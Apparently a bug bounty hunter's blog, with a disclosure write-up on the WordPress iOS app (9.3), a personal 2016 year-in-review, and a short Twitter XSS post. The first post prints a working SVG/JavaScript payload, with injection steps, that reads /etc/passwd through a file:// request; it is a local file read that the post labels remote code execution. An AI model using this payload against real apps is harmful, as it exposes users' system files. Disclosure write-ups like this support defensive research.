Wednesday, February 21, 2018

[RCE] Remote Code Execution in Wordpress iOS Application (version 9.3)





Hello Everyone,

This article will show you how I found a Remote Code Execution Vulnerability in Wordpress iOS Application version 9.3 on my iPod Touch (iOS version 9.3.5). 

It was a cold thursday night of February 15 when I was looking for a good program to spend my night with. While checking on Hackerone's hacktivity page, I found some good stuffs to read and found out that Wordpress have some newly disclosed reports which gives me a motivation to spend my night on their program.

I fired up my sublist3r to check if there some good subdomains to hunt. after few hours of looking for some vulnerabilities on different subdomains and directories, I didn't find even one so I go to my inbox and check my previous reports on Wordpress. I noticed that I have reported an issue which I found on Wordpress iOS app a year ago.

My previous report gives me another idea so I downloaded the Wordpress iOS app again on my iPod Touch which is stuck on iOS version 9.3.5 since Apple didn't release an update anymore. while downloading the app, it says that the new version of the app is not compatible with my iOS version so I need to download the previous/older version of the app that is compatible for my device. So I download the Wordpress iOS app version 9.3 which is the recommended version from app store for device.

After downloading the app, I found some XSS issues but didn't reported it since it was just a self-XSS. after a few hours of having fun with the app, I found this Remote Code Execution vulnerability on the editor of the app. so below is the proof of concept I reported to wordpress.




Proof of Concept


Hello,

I found out that Wordpress IOS Application has a Remote Code Execution when posting a blog via IOS Application.

Tested in IOS 9.3.5

Injected Payload

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">

<script>

function readTextFile(file)

{

var rawFile = new XMLHttpRequest();

rawFile.open("GET", file, false);

rawFile.onreadystatechange = function ()

{

if(rawFile.readyState === 4)

{

if(rawFile.status === 200 || rawFile.status == 0)

{

var allText = rawFile.responseText;

alert(allText);

}

}

}

rawFile.send(null);

}
readTextFile("file:///../../../../../etc/passwd");

</script>

</svg>



Steps
  1. Login to your Wordpress account using Wordpress IOS Application
  2. Create a new blog post
  3. In the Post body tap the <> button then input the given payload.
  4. tap the <> button again and see the result.

I hope you will fix this issue as soon as possible.
Cheers and have a good day,

Evan


Result






Timeline 
Reported: February 15, 2018 
First Response: February 15, 2018 
Second Response (Marked as Needs more information): February 15, 2018 
Third Response (Marked as Informative): February 21, 2018   
Final Response (Hi. Sure, please feel free to publish it on your blog if you'd like.): February 21, 2018   






I hope you enjoy this article.



Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey
"Life is a journey that must be traveled no matter how bad the roads and accommodations."
~ Oliver Goldsmith
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey

Monday, December 05, 2016

2016 Year in Review



2016 Year in Review


Hello Everyone,


This year, I would like to end my 2016 with a Year in Review.


2016; Another wonderful year in my life, lots of awesome, amazing and memorable things happened. Lots of failure, successful stuffs and etc... So, as the year comes to an end, here are the things that happened in my 2016 journey.


-----


1. Travels, lot's of traveling stuff happened this year although not outside of Mindanao but still, one of favorite things that I've done this year. Traveling and meeting new people and cultures is one of my main life goals.

This year, I traveled to Pagadian City, Zamboanga City, Dipolog City, Dapitan City (It was my first time in Dapitan, such a lovely place.) and Baroy, Lanao Del Norte. Hopefully next year, I want to spent some of my bug bounty rewards for another Travel adventure, I already have the list of the places that I want to go.


Here are some of the pictures I took during my travels.

On my way to Dapitan.
Visited Gloria de Dapitan for the first time.
Chillin' at the bench inside Gloria de Dapitan with my homies
Me sitting on the wooden bench inside Jose Rizal's house (Replica)
While waiting for my name to be called at the NBI Office in Pagadian City.
On my way to Baroy, Lanao Del Norte.
Chill morning in Baroy, Lanao.
On my way home from Baroy, took this shot while in Aurora, Zamboanga Del Sur.
On my way to Zamboanga City.
Took a picture of Jose Rizal's house (Replica) in Talisay, Dapitan City.




All in all, my travel adventure this year is such a wonderful experience.


 -----


2. The Bug bounty, for the past 4 years in my bug bounty career, I learned a lot of things in the field of Information Technology, meet new friends (some are just in Social Media), Earned some money without having a regular job (just the bug bounty thing), Bought some things that I want using my bug bounty rewards.

I started participating in the bug bounty community mid of 2013, I reported a lot of different security vulnerabilities for hundreds of companies since then. but in 2016, my bug bounty journey is a little bit different from the past years, I become a seasonal researcher since I can't handle my time for it unlike before but still, this year's bug bounty journey is just another wonderful and memorable adventure.

I was acknowledged again by Microsoft for the second time.

Twitter for the third time "two times for this year" (2013, 2014 and 2016) [Write Up of one of the issues I reported this year >> Here].

Discovered a critical vulnerability in Cydia [iOS] (Write Up was here) but decided not to report it.

Discovered a Universal XSS in Comodo Dragon version 29.1.0.0 (Write was here, shout out to Inti De Ceukelaire for this thing).

Acknowledged and rewarded by different companies, can't mention them all but thank you very much to those companies, really stoked to have them become part of my 2016 bug bounty adventure.

Joined the most prestigious "Synack Red Team" community (just another dream come true for me).

Pulled out from the Bugcrowd Top 100 Security Researchers but hopefully before this year will finally end, I will be on the Top 100 again since I made a promise to be to on the Bugcrowd top 100 researchers for 4 years.

Received much bounties from different companies (Thank you bug bounty).

Just like the previous years, participated in some private and flex bug bounty programs and received a bounties from them.

One of my favorite thing in bug bounty, the swags; received a lot of swag from different companies.

Just like before, met new people (specially in social media) some of them become really a friend, some of them are just like the kind of people that think hacker is just a guy who hacks a facebook account (HAHAHA!), some of them are the people who also ask a help on how to start participating bug bounty programs. 

All in all, this years bug bounty adventure is so hype although it's a little bit different from the previous years but still, I managed to make it another year of wonderful bug bounty adventure. Thank you to all the companies specially Bugcrowd, Hackerone, Cobalt and to my new family, the Synack Red Team, words can't describe how happy I am that you guys become part of my another wonderful bug bounty adventure, I hope next year's adventure will be more exciting and interesting.


-----


3. The job opportunities, just like the previous years, I received a lot of job opportunities this year because of my bug bounty career as a security researcher but I decided not to accept them for now since all I want to do first is to enjoy my teenage adventure, enjoy my life as a single person. jobs are everywhere though some say's that opportunities knocks once, I'm not afraid of not accepting those opportunities that was given to me, I remember, there was an article that I read before about why he left the company where he was working, he say's on his blog that he don't want to stick in one company or job, all he want to build his own company and learn and progress more on it.


-----


4. My Adventure with my IBBRC Family, As a BMXer, IBBRC (Ipil Board and Bike Riding Community) is also a big part of this years adventure, we did a lot of filming stuffs, discovered a lot of beautiful spots in our hometown, meet new friends because of riding, lot's of crash and new tricks, better progression for everyone in the team. All in all, I'm so stoked that my IBBRC family have a wonderful part of my 2016 journey, really hype for all my friends in IBBRC.

Here's some of our projects we did for this year:

 







We filmed a lot this year and hopefully next year, more video edits.



-----


5. My music career, as a EDM Producer, having a family of producers is a dream come true. this year, a friend of mine ask me to join his group of music producers (although the group is not so big enough but I'm happy to become part of it) so that I can promote my tracks easily with them. Although I'm not so active enough on producing EDM tracks since the last few months, Virtous Music still invited me to become part of their group (The group was like a record label), released 4 of my EDM tracks with them. having them become part of my 2016 adventure is one of the happiest moment in my life. Thanks to my Virtous Music family.


-----


6. My Invalid Web Security (IWS) Family, We shared a lots of ideas, I learned a lot from my IWS Family, really happy to have my IWS family become part of my 2016 adventure.



This year, I shared a lot of moments with the people I met, learned a lot from them. They motivate me to progress more for the upcoming years, really happy to have them on this year's adventure.

So, I hope you guys also enjoy your 2016 adventure, Happy Holidays.

"The best way to pay for a lovely moment is to enjoy it." 
-Richard Bach

Monday, September 26, 2016

XSS Vulnerability in Twitter [https://twitter.com] (Write Up)



Twitter XSS (Write Up)



Since I successfully transferred my blog from Wordpress to Blogger, To celebrate, here's a short write up of my previous report on Twitter which I got a bounty of $280 for reporting it to Twitter Security team.

Few months ago, I found a Cross Site Scripting (XSS) Vulnerability in Twitter while reading and tweeting.


Proof of Concept


XSS in Twitter

This issue was reported and fixed already by Twitter Security Team.

--Timeline--

Reported: 2016-03-05
First Reply: 2016-03-07 (Twitter)
Triaged: 2016-03-09 (Twitter)
Bounty Awarded: 2016-03-12
Fixed: 2016-05-20

I hope you enjoy this article.

Thanks,
Evan - Invalid Web Security


"The most important thing is to enjoy your life, to be happy, It's all that matters."
~Audrey Hepburn